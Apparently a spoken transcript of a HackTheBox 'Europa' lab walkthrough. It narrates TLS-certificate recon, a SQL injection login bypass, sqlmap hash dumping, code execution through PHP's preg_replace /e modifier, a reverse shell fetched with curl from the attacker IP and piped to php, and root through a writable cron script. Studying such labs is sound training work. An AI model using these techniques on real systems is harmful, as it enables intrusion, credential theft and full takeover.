What's going on YouTube? This is IppSec and I'm going to be doing the Europa machine from HackTheBox. This box was rated as easy. I think it may be more of a medium box just because it requires programming insight to identify what a regular expression looks like, and once you see that, you can quickly find out the server is doing something really silly, exploit it, and get a shell. But before we even get to the regular expressions, there is some work to do, so let's jump in. Instead of doing the boring old Nmap, we're going to use a tool called Sparta. I realize I always try to show different tools. I never showed a different Recon. I normally don't use Sparta just because it does so much, and I'm a console cowboy. I love having full control of everything and knowing exactly what's going to happen. So just open up Sparta. If you don't have this, you can do apt install Sparta on Kali, and we can add host to scope. The IP address is 10.10.10.22. Once we add this to scope, it's going to start kicking off a bunch of things. The first thing is going to be an Nmap. And then once this Nmap finishes, it's going to do like nicto if it sees web services, other things if it sees other services. The main issue I have with Sparta is the fact that it does all of this. I've had cases where it identified like Samba or something and attempted to do a brute force attack and locked accounts. So that's why I like having fine control over everything. The thing that Sparta does really well is keeps everything super duper organized. So we have results right here. We can click on the host. If we had multiple hosts, they'd appear here. We got a services tab, so it's run HTTP things. We saw after it finished Nmap stage 1, that's just a quick scan. It starts Nmap stage 2, which takes a little bit longer. And it saw 80 and 443 was open, so it started nicto against those ports and took HTTP screenshots. So you can see how this comes in handy if you always want to have Recon going in the background, because it automatically stages all of your Recon, so you don't have to keep going back and adding new things. So if we go to the Services tab, we should be able to click on 443, and it should have identified this as SSL and had SSL options here. But if we hold Shift and right-click 443, we can see everything it has. So I'm going to do Run SSL Lies and kick that job off, and I'm going to do Run SSL Scan, because port 443 should have a certificate. So we see SSL Lies looks like it finished. If we go over to the Tools tab, we can see that. So we see the available plugins for that tool. And if we scroll down, we see subject alternative names, www.europacorp.htb, and adminportal.europacorp.htb. So that was a bit cheating because I knew if we just went here, as we saw in the screenshot, we the Apache Ubuntu default page. The other thing I would have done is I would have probably right-clicked and sent to Doorbuster. And then we can browse to a word list, so we'll do user share word list, Doorbuster, and then, sure, directory list or something. Start that. Minimize it, and if we go over the tools, we now have Doorbuster, and we can see the output here. So you can see how this comes in handy. But again, the key thing was looking at these subject alternative names. SSL Lies shows that, and SSL Scan shows that. If you wanted to do it without a tool, the easiest way, just go to HTTPS 10.10.10.22, advance to accept the certificate, add exception, view the certificate, go over into the details, and if you clicked around, you would see certificate subject alternative names and admin-portal.europacorp.htb along with www. So we'll copy this. Actually, we can show exactly what happens. So if we turn intercept on, go to this page, accept, we have to turn burp on. Accept. Because it's doing something called virtual host routing, which means it examines the domain name and then identifies where you go on the server based upon the domain name. So that works by just this host thing. So at host 10.10.10.22, the server is going to give us that Apache default page. If we change this host to admin-portal.europacorp.htb, we get a different page. It's a 302 redirect to login.php, and we follow that. It should come out. Not sure what's going on there. Click go. Oh, unknown host. So he follows the redirect. It doesn't know how to get there. So let's edit our host file to add that. Admin portal.europacorp.htb. And now when we click go, I must have a typo. That's weird. It's definitely there. Close out. Go into browser. HTTPS. Admin portal. .europa. What am I doing wrong? Let's turn intercept off. Refresh. That works. So I guess burp is not picking up the host tab when I edit it. So let's close out burp. Open it back up. And see if it fixes that. That was a weird issue. I don't care about that update. And we can go back, look at Sparta. It's still doing that dir buster, and now has launched Nmap Stage 4. So again, Stage 1, very few ports. Stage 2 opens it up a bit more. Stage 3 probably runs scripts. Stage 4, it's probably doing all ports. And we can see SSH is open on it. So burp should be loaded. Intercept off. Proxy default. Okay, now burp is recognizing my host entry. I don't think I've ever seen that happen. That was bizarre. So, okay. Everything is right in the world. Turn intercept off so we can look at this. So, we get this login page. The very first thing I do, try admin password. Attempt to log in. It says, please enter email address. So we know there's some type of validation going on user side to not send that login request and just say, hey, that's not a email. So that's interesting. I'm going to do admin@europacorp.htb. The reason I'm doing that is if we go back into the SSL stuff, we should see that email address in here as the contact. Europa. SSL scan? Does that show it? I'm not showing the output of those tools, but if we right click, this is now going through port swigger, which is burp. Disable this so we can see the real certificate. So we can see the real certificate. This is getting annoying. But okay, we see the real one. If we go over into, let's see, the issuer, we see admin@europacorp.htb. So that's why I chose that email. Information you can get from SSL certificates. So just try like the password is password, attempt to log in, get a failed. So I'm going to send this over into repeater so we can easily play with it because I get annoyed when things clear my login form whenever I click something because it makes me retype a lot. Set to burp. Log in. Send this over to repeater. So this is what happens on a failed login attempt. So let's just try the comment or 1 equals 1 there. That didn't work. So what I'm going to try to do, and specifically because I saw them put some type of filtering in the email portion on user side, I'm going to insert SQL injection here. So we're going to do pretty much the same thing, except put it in the email, and we get a 302 found. If we follow the redirection, we get in. So what just happened? Why didn't I do the 1 equals 1? I probably could have, and it may have worked. But the login request probably looks like select star from accounts where email equals email and password equals password. So if there's no SQL injection, this will only return one result when you have a valid email and password. What we did was we changed email to be admin@europacorp.htb and then added in our own apostrophe and then commented everything else out. So it was just select star from accounts where email is admin@europacorp.htb, lets us in. And if we added that or 1 equals 1, we probably wouldn't even need a valid email address. It would just go to the very first email that works. So if we try this, put an invalid email, probably have to kill a cookie. Get rid of this. Let's see. Raw. Grab this cookie because this one's not authenticated yet. And we just try an invalid email. So we'll do IppSec@nowhere.net. And we'll see if this logs us in. It doesn't, because this email doesn't exist. But if we do IppSec@nowhere.net or 1 equals 1, it'd probably log us in as admin. Or not. Let's see. I thought that would have worked. Maybe not. Maybe I'm doing something wrong. But if you want, you can play around with that. We're just going to go with what we know works, is admin@europacorp.htb. And it logs us in, follow the redirection, and we get that. So just turn intercept off. We get to the dashboard. And since we know there's SQL injection, I'm going to go back to my terminal. We're going to do SQLMap. Go to burp, HTTP history, login. We want to post that one. I know I could copy the file, but I don't know exactly where my burps directory is, and I don't feel like specifying this. I'm just going to do it this way. And then we'll get rid of the spaces. And we can do SQLMap -r login -request -- dbms, I think, MySQL -p for parameter, username. Cat login, email. Not found. So we probably didn't find it because our PHP session is authenticated. So let's go back into the repeater tab and grab one that is not. So we get rid of the cookie, grab the new one, go over back into our login request, delete, paste. Not found. Why is this getting 404s? So let's try this again. We copy cookie, paste it. Oh, I think I have to specify --SSL or -SSL. There we go. Nope, that's not it. SQLMap -h grep SSL grep -I SSL HTTPS. There is a flag to force SSL. It may be -force SSL. There we go. --force -SSL. So what was happening is SQLMap was trying to go over port 80. I want to say no, do SSL, and there we go. Because if we just go to admin portal without SSL, I may have SSL anywhere. Yeah, we get not found. So that page only exists on the HTTPS side. If you don't specify HTTPS, it's that Apache 2 Ubuntu page. So that was the issue I was having with SQLMap. Looks like it's found it. So we just hit enter a few times and it will start extracting data. While we go, we look at this web page. Almost everything here is doing nothing. I'm clicking at these links and we can't do anything. So nothing there. We type stuff here, nothing inputs. So this page looks like a bust. If we go over to the Tools tab, we see something odd. And does SQLMap ask? Nope. So what I'm going to do is send this over into burp, and we're going to look at what exactly happens. Actually, before I do that, we can just say IppSec, and then click Generate, and we see the remote address replaces with IppSec. So what happens is this is a search and replace, and it's replacing IP address with whatever we put here. So now we inspect this traffic, generate, send this over to repeater, and we see a lot of data. So what I'm going to do, highlight all this. I'm going to press Control-Shift-U. So we're going to HTTP decode this, or URL decode. I forget which one that is. Is it Control-Shift? URL decode, not HTTP. But URL decode that. Let's URL decode this. And we see the pattern is IP address replace with IppSec. So if we change this to be like, let's just say vton0, and we can see if we can send this without re-encoding it. Render. Yeah, we can. We see the vton0 got replaced with IppSec. So these slashes mean regular expression. So what I did was I went to Google and I did PHP regular expression danger. And we have the unexpected dangers of preg replace. So this is probably the function that they're using to do the regular expression. And you scroll down. Let's see. We can see them adding a /e, and that means /expression. And now you can do PHP code where that is. So it may be hard to explain, but it's easy to see. So we add a E to the end of this slash. And now we can do system, who am I? And when we click go, we get www-data in the output where we had IppSec previously. If that /e was not there, it's just going to input system who am I. Yeah. So that's what the /e does. I think it means /expression, but definitely read this blog post because it will explain everything better than I can. What we're going to do is do a system call to curl. I'm going to go to my IP address. Oh, real quick. We'll just do -- dump on that SQLMap. Let's see. It's going to start dumping things. Sure. But we see it had dumped admin Europa Corp this hash. And we can Google this to see if it decrypts. That looks like MD5. Copy. Paste. Result 4. MD5 decrypt. Let's see if it's in this. Not a robot. Images with cars. I don't know if I see a car there. Traffic lights. I hate captchas. There we go. Decrypt. And this may be the password. That is weird. But anyways, that's one of the benefits to always doing Recon in the background. If we got stuck, we may have potential passwords to get root. And I wonder if that password may actually work. Let's just do it to hashes.org. I know this doesn't ask me for a CAPTCHA. Because I'm going to actually save that. I never tried to see if that's actually the valid password for root. D7PJGWQ. Oh. MD5 decrypt was wrong. Super secret password. That is the password for the account. So, always use hashes.org for hashes. Always. Anyways, I got sidetracked. Where was I? Oh, we have to get the shell. So, what I'm going to do is go into opt shells PHP, and I'm going to use PHP reverse shell. If you Google pentest monkey and reverse shell, you'll find the script. And we're just going to make sure it has my IP, 10.10.14.4, if config 10.10.14.4. So it's going to send a shell to this IP on port 8001. Sounds good to me. So python-m, simple HTTP server, port 80, and we'll open a new thing, nc lvnp 8001. Go back into burp, /e, so if we curl http 10.10.14.4 /php reverse shell.php, it's going to output all the contents. If I pipe that to PHP, it should execute. Got the request and got a shell. So we're going to do python-c import pty pty.spawn bin bash python not found python3-c import pty pty.spawn bin bash. Got the shell, background it, sty size, sty raw minus echo, foreground, sty rows 48, cols 186. And that stty thing I haven't done in all my videos. It's something I picked up recently and makes just a terminal appear better. If we v-etc pass wd, it looks a bit better. Watch the Apocalypse video if you want to see what happens with that process. But anyways, let's do lin-enum now. So I'm going to minimize that. Let's change where... Oh, we can leave it there, actually, and just do another split. And we're going to go to opt lin PrivEsc, and I'm going to do lin-enum.sh. So python m, simple HTTP server 81 we'll listen on. So I can do curl 10.10.14.4.81 len enum.sh, and it just outputs that scan. It doesn't actually execute anything, but if we pipe that to bash or sh, it will start executing. So let this finish. Shouldn't take too long. You can see the exploit on the screen right now. That is the interesting thing is, but we'll let it finish and go over it. Let's go back to SQLMap did finish. So len enum, go to the top. So we can see the kernel's 2017 of June. Probably no PrivEsc since then. It's Ubuntu Xenial 1604.2. We're running as www data. The user John is logged in. Environment variables, login shells, cronjobs, and everything looks default except this one cron job. So we're going to look into that. And first I want to su sudo john su. Do I still have that here? Super secret password. Super secret password. Nope, that's not the password for John. And not the password for root. So let's take a look at what that one script we copied was. So cd over there, ls-la, we see root owns it, it's not writable. So let's view that file. And we see it's another PHP script, and it is calling logcleared.sh. I don't know why I just copied that. It's in vir dub cmd ls-la. Logclear.sh is owned by www data. If we edit this file, I guess I didn't clean up, but it is word writable. The file shouldn't exist on the server. If someone was on it before, they may have not removed it. So if you look at the directory permissions, you see that www data is the group owner of that folder, and the group is writable, so we can write in here. So if we vlogcleared.sh, we can execute commands here. So we could do something like chmod 4755, add the sticky bit to bin ls less. And then every minute it was executing. So if we do a ls, al, or la on bin less now, the sticky bit, or not sticky, set UID bit has been added. I don't know why I always call that sticky, but set UID bit has been added. So now when we do less, it can switch to the root user's context and let us do things like view the etc shadow file. Or we could view root.txt and get the password that way. If we want to get a full shell, we could upload a set UID binary, or just go to pentestmonkey reverse shell, and we will use this one because this always works. I say always works, like 99% of the time this one works and other ones don't. So this is just the most reliable one I found on that site. Change this to 10.10, 10.14, 4. We'll do port 8002. And we can split this again and see LVNP 8002. And it should run in about 30 seconds. So we'll see if that happens, and if it does, then huzzah. If not, we'll have to do a little bit of troubleshooting. So about 15 seconds left. Go back over in Sparta, we can look. It is still running Dirbuster, but all the Nmap finished. We go to Dirbuster, and still just searching directories. And it did not send us the shell. That was unique. Oh. ls-la chmod plus x to make this executable. logclear.sh. That script has to be executable. There we go. So we wait another 30 seconds, and then we get root, and this machine is done, hopefully. Date, 20 seconds left. $15 seconds. Mississippi. So, should be in 3, 2, 1, shell. There we go. If we do ID, we are now root, and we can cd/root cat root.txt and get the flag. So, that is the box. Hope you guys enjoyed the video, and take care.